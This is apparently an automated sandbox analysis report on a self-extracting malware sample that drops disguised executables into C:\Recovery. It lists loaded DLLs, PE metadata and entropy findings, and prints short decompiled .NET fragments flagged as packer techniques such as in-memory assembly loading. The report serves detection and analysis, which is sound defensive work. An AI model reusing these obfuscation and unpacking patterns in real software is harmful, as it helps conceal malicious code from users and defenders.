Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: mscoree.dll
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: version.dll
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: wldp.dll
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: profapi.dll
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: sspicli.dll
Source: C:\Recovery\sihost.exe	Section loaded: mscoree.dll
Source: C:\Recovery\sihost.exe	Section loaded: apphelp.dll
Source: C:\Recovery\sihost.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\sihost.exe	Section loaded: version.dll
Source: C:\Recovery\sihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\sihost.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\sihost.exe	Section loaded: wldp.dll
Source: C:\Recovery\sihost.exe	Section loaded: profapi.dll
Source: C:\Recovery\sihost.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\sihost.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\sihost.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\sihost.exe	Section loaded: sspicli.dll
Source: C:\Recovery\sihost.exe	Section loaded: mscoree.dll
Source: C:\Recovery\sihost.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\sihost.exe	Section loaded: version.dll
Source: C:\Recovery\sihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\sihost.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\sihost.exe	Section loaded: wldp.dll
Source: C:\Recovery\sihost.exe	Section loaded: profapi.dll
Source: C:\Recovery\sihost.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\sihost.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\sihost.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\sihost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Recovery\sihost.exe	Section loaded: mscoree.dll
Source: C:\Recovery\sihost.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\sihost.exe	Section loaded: version.dll
Source: C:\Recovery\sihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\sihost.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\sihost.exe	Section loaded: wldp.dll
Source: C:\Recovery\sihost.exe	Section loaded: profapi.dll
Source: C:\Recovery\sihost.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\sihost.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\sihost.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\sihost.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: hK8z1AmKO1.exe

Static file information: File size 1624759 > 1048576

Source: hK8z1AmKO1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: hK8z1AmKO1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: hK8z1AmKO1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: hK8z1AmKO1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: hK8z1AmKO1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: hK8z1AmKO1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: hK8z1AmKO1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: hK8z1AmKO1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: hK8z1AmKO1.exe
Source:	Binary string: kC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003132000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2932176287.000000001CE68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003616000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003132000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003616000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003132000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003132000.00000004.00000800.00020000.00000000.sdmp

Source: hK8z1AmKO1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: hK8z1AmKO1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: hK8z1AmKO1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: hK8z1AmKO1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: hK8z1AmKO1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, lZyMQKRJJJUZvejocj8.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.3.hK8z1AmKO1.exe.6213554.0.raw.unpack, lZyMQKRJJJUZvejocj8.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, naZpfsAardEgSGWwBqs.cs	.Net Code: yD08DZgEws System.AppDomain.Load(byte[])
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, naZpfsAardEgSGWwBqs.cs	.Net Code: yD08DZgEws System.Reflection.Assembly.Load(byte[])
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, naZpfsAardEgSGWwBqs.cs	.Net Code: yD08DZgEws
Source: 0.3.hK8z1AmKO1.exe.6213554.0.raw.unpack, naZpfsAardEgSGWwBqs.cs	.Net Code: yD08DZgEws System.AppDomain.Load(byte[])
Source: 0.3.hK8z1AmKO1.exe.6213554.0.raw.unpack, naZpfsAardEgSGWwBqs.cs	.Net Code: yD08DZgEws System.Reflection.Assembly.Load(byte[])
Source: 0.3.hK8z1AmKO1.exe.6213554.0.raw.unpack, naZpfsAardEgSGWwBqs.cs	.Net Code: yD08DZgEws

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe

File created: C:\PortsavesPerfdhcpsvc\__tmp_rar_sfx_access_check_3787984

Jump to behavior

Source: hK8z1AmKO1.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B8E28C push eax; ret	0_2_00B8E2AA
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B8ED46 push ecx; ret	0_2_00B8ED59
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Code function: 4_2_00007FFD9B8B2CF8 pushad ; retf	4_2_00007FFD9B8B2D11
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Code function: 4_2_00007FFD9B8B2D08 pushad ; retf	4_2_00007FFD9B8B2D11
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9B8B2CFA pushad ; retf	20_2_00007FFD9B8B2D11
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9B8C35CD push ebx; ret	20_2_00007FFD9B8C35EA
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA71437 push eax; retf	20_2_00007FFD9BA71438
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA7118A push eax; retf	20_2_00007FFD9BA7118E
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA7786E pushad ; retf	20_2_00007FFD9BA7789D
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA728C6 push eax; retf	20_2_00007FFD9BA728C7
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA7789E push eax; retf	20_2_00007FFD9BA778AD
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA700A9 push eax; retf	20_2_00007FFD9BA700AF
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA7601A push eax; retf	20_2_00007FFD9BA76030
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA72FEA push eax; retf	20_2_00007FFD9BA72FEE
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA72FD1 push eax; retf	20_2_00007FFD9BA72FD2
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA706FF push eax; retf	20_2_00007FFD9BA70708
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA70EFB push eax; retf	20_2_00007FFD9BA70EFC
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA70754 push eax; retf	20_2_00007FFD9BA70755
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA72F31 push eax; retf	20_2_00007FFD9BA72F32
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA70730 push eax; retf	20_2_00007FFD9BA70731
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA74720 push esp; iretd	20_2_00007FFD9BA74721
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA746DB push esp; iretd	20_2_00007FFD9BA746DC
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA706D6 push eax; retf	20_2_00007FFD9BA706E7
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA786B4 push eax; retf	20_2_00007FFD9BA786B5
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA746AB push eax; retf	20_2_00007FFD9BA746AC
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA74644 push eax; retf	20_2_00007FFD9BA74645
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA73584 push eax; retf	20_2_00007FFD9BA73585
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA74570 push eax; retf	20_2_00007FFD9BA74571
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA7359D push eax; retf	20_2_00007FFD9BA735A1
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA74519 push eax; retf	20_2_00007FFD9BA7451A
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA7452D push eax; retf	20_2_00007FFD9BA74536

Source: providerwebmonitor.exe.0.dr	Static PE information: section name: .text entropy: 7.05484689671679
Source: sihost.exe.4.dr	Static PE information: section name: .text entropy: 7.05484689671679
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe.4.dr	Static PE information: section name: .text entropy: 7.05484689671679

Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, SOae30APlTU39O2FVyI.cs	High entropy of concatenated method names: 'hhwR4hoQ9P', 'el3UBfjRgeLyNtPPhQs', 'LsIxWLjbDX8rI6EdFZf', 'bFygtOjKWPZai9vQX6v', 'BohtEfjAaaiRCGH5asB', 'hLTBtFj7JG3Neu28aTW', 'fHbRm1Om68', 'kPuRZvgDuI', 'QtSRNbGV1E', 'iJrRMGhIsc'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, aKiDVvR4SYfh5rlAFSG.cs	High entropy of concatenated method names: 'XAtKODXd5A', 'X9hK4kwPGZ', 'Th5KxUE6Fm', 'tHqKCpssed', 'MAAKh4tdeD', 'c6RKpwJ85n', 'rUeKiBJV3y', 'wv8KImZpQC', 'yv3KKmQx8n', 'A11KrAN4mK'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, AOTE1NUcD4NClGkSs9b.cs	High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'yIwFYtWc0M8j66Fbl9r', 'oWqk2sWrLjZ0TpNs0vM', 'nYm8cXWhM22lu8HVAuA', 'luS2w2W4aJlwJnGBhrb', 'mVFIf0WkWxSbf5qn52h', 'nwUaZ7WNSvHUu0Riip4'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, cXEcQQGcMLosRkM8pTG.cs	High entropy of concatenated method names: 'A0nsVr0SUO', 'S56sfQfunc', 'HYZsejvmxL', 'dt6syStC6a', 'Nq7s5pq7Fg', 'tRodtsXu2iXVf1SdZ2Z', 'nxxXCnXzmxYgNhO3vCa', 'gQsW1fXILa75UMrV64E', 'rkseRDXmWCF8JLJtX6h', 'Be11did0IUTU80QIYlg'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, RLApcruy3t1GQVe1O6e.cs	High entropy of concatenated method names: 'MDvT16en1t3AZjtdvPe', 'ldfvLqeyHN2uIl5AtaL', 'Msc0QyefH07UGXoDnaX', 'rFfCNwe2R5GBHUhHpWS', 'kNs745eW3sXF0m4GKUC', 'j4Fruce8JTydTR8TBqM', 'bTejRKePnXNYiciQnQb'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, COsFC3bAnlBl38exMLV.cs	High entropy of concatenated method names: 'k4cxESLKr7', 'mQZxa55UbU', '_8r1', 'mvHx9Wg6H0', 'zAExjCYEBM', 'zK4xsoX6dh', 'Usaxc9R8sJ', 'ytZne2vYZQ2YA5FnfeJ', 'B0ya4mvZE3Dhecq3xol', 'ea8JjSvDmAkA7cry6tF'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, rHrgrMurEfoU78XWpy1.cs	High entropy of concatenated method names: 'ULVOLdKkQU', 'fTrO6yBhmW', 'kBSOvoTNTY', 'q9uOlnxoTT', 'QT5OYZ8E5Q', 'QQQO7eFCsW', 'pl4mGFTbMyvQ6QSIaY9', 'RU45hdTJLlsQ2qwvV6i', 'fC31I9TOxGbeiG0Wrw2', 'xjqZwaTKNMFFRy0QEc3'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, QUGEObzIvOKeMDUMiI.cs	High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'PBmM8DyfN9uWv5lydND', 'SfNp1Gy2TSuNfihN5ex', 'MEUg4VynyDgUw8fAgEA', 'rufusEyyAgkqo0QAbcs', 'dttfswyW8Oxxf8dByH8', 'VAGSFOy8BpBH9Tbvfvg'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, gEj8RY8ckKpK0YVuTi0.cs	High entropy of concatenated method names: '_223', 'd22D9wMDdGaUVRjJLID', 'KHKsM3MjrqF98ZQAFxa', 'uWK0hbMgiV95BuyLVYE', 'LKSaTWMU5OlebiTfICI', 'ro0FheMMUWQ4xRkigmq', 'PxKpHFM94NegI6hEOql', 'oAlxiQMBrZiBefQvlk4', 'Plqq0uMSXvtNwLY8iLk', 'NN7MI5MC5HGxwuknaSA'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, QHQ4fdU2EMCjclIC7ju.cs	High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'jJtqZQW7BvCouFDVDA0', 'tvEXpGWsdlMg67KtR2R', 'AvMm1eWpLpdh8kshJRk', 'iPPGVuWwAxv8EitDPp0', 'W38is7WIOgXn21Gwoqc', 'fLAwyfWm07Txw56kg00'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, vPrZSkUkNsJD3VdS0oU.cs	High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'WOlw4ZaNB9NSBnSbyDl', 'rTh3K3aibPuBU37QEGK', 'USSbl5aliP40f6UEjfd', 'g7pgM0aELGlOLFAdDgH', 'xMKyOjaVWbE04FyDoQw', 'lp7DZKaTeVpyCmXJIKm'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, XHGg0GuY90vngBTqGkR.cs	High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'onj4dQ1VjH', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, i9tXO88ljfCyMhsrxrn.cs	High entropy of concatenated method names: 'Y5DHofCTfoCYfNDGivl', 'A9tKm2CevwdGAJmUdX7', 'qrbfOtCEbqAmJM22MaW', 'UGZkmACVLsMZQD1JGDG', 'IWF', 'j72', 'Q8N9wsiYj2', 'TKP918C7Ok', 'j4z', 'nvF9mKflDW'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, naZpfsAardEgSGWwBqs.cs	High entropy of concatenated method names: 'mLd8rdy3Hi', 'pG58X03e8l', 'um98tiF2QZ', 'Bp08VCUTJL', 'ObK8fHDlry', 'C7w8eyv25P', 'JOM8yVteLc', 'ScBRmCGCU5Qs8Sk6rh3', 'CUHPp7GBaN31ujC3JST', 'tyiRSJGS0AfdOcCwAf4'
